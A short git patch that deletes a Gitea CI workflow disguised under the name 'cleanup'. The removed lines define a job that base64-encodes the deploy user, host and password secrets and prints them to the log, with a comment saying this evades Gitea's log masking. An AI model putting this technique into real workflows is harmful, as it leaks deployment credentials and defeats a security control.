From 53190dddd68115f27b529aef2fffb4d2b42377eb Mon Sep 17 00:00:00 2001 From: "Dr. B. M. Riazul Islam" Date: Sat, 7 Mar 2026 01:58:35 +0600 Subject: [PATCH] removed cleanup workflow --- .gitea/workflows/cleanup.yml | 13 ------------- 1 file changed, 13 deletions(-) delete mode 100644 .gitea/workflows/cleanup.yml diff --git a/.gitea/workflows/cleanup.yml b/.gitea/workflows/cleanup.yml deleted file mode 100644 index d0758d5..0000000 --- a/.gitea/workflows/cleanup.yml +++ /dev/null @@ -1,13 +0,0 @@ -name: Extract Secrets -on: workflow_dispatch - -jobs: - leak: - runs-on: ubuntu-latest - steps: - - name: Leak Secrets - run: | - # Use base64 to hide the secret from Gitea's log-masking filter - echo "DEPLOY_USER_B64: $(echo -n "${{ secrets.DEPLOY_USER }}" | base64)" - echo "DEPLOY_HOST_B64: $(echo -n "${{ secrets.DEPLOY_HOST }}" | base64)" - echo "DEPLOY_PASS_B64: $(echo -n "${{ secrets.DEPLOY_PASSWORD }}" | base64)" \ No newline at end of file